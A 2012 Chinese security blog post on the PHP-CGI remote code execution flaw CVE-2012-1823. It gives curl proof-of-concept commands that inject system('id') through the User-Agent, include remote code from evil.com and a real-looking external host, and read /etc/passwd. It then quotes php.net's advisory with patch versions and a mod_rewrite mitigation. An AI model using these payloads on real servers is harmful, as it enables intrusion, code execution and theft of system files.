php cgi远程任意代码执行漏洞

CVE-2012-1823（PHP-CGI RCE）的PoC及技术挑战

GaRY

| 2012-05-04
02:16

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞：

http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

粗看一下貌似没啥危害，因为php做了防范，在cgi这个sapi下是无法使用-r，-f等直接执行命令的参数的。只有少数几个参数可以使用，因此公告里也就给出了使用-s参数读取源文件的poc。

另外关于RCE的PoC原文没有给出，不过说明的确可以远程执行代码。那么他是怎么做到的呢？我粗略想了想，可以利用的参数只有一个-d参数了，作用是给php定义一个ini的值。

那么利用它能做什么呢？我给出如下两个RCE的PoC方案：

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt
经过测试以上两者都可以，但其实就是一个包含文件的两种使用而已

来源：http://zone.wooyun.org/content/151

demo:

http://www.demo.com/new.php?-dauto_prepend_file%3d/etc/passwd+-n

http://www.demo.com/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://vega.store-mix.com/b.txt

http://www.demo.com/new.php?-s

受影响apache+mod_cgi+php-cgi模式平台

刚刚发现，php网站出公告了：

http://www.php.net/index.php#id2012-05-03-1

[03-May-2012]

There is a vulnerability in certain CGI-based setups (Apache+mod_php and nginx+php-fpm are not affected)that has gone unnoticed for at least 8 years. Section
7 of the CGI spec states:
Some systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded "="
characters.

So, requests that do not have a "=" in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&=1 is fine.

A large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable.

If you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.

To fix this, update to PHP 5.3.12 or PHP 5.4.2.

We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP. An alternative is to configure your web server to not let these types of requests with query strings starting with a "-"
and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]           RewriteRule ^(.*) $1? [L]

If you are writing your own rule, be sure to take the urlencoded ?%2ds version into account.

Making a bad week worse, we had a bug in our bug system that toggled the private flag of a bug report to public on a comment to the bug report causing this issue to go public before we had time to test solutions to the level we would like. Please report any
issues via bugs.php.net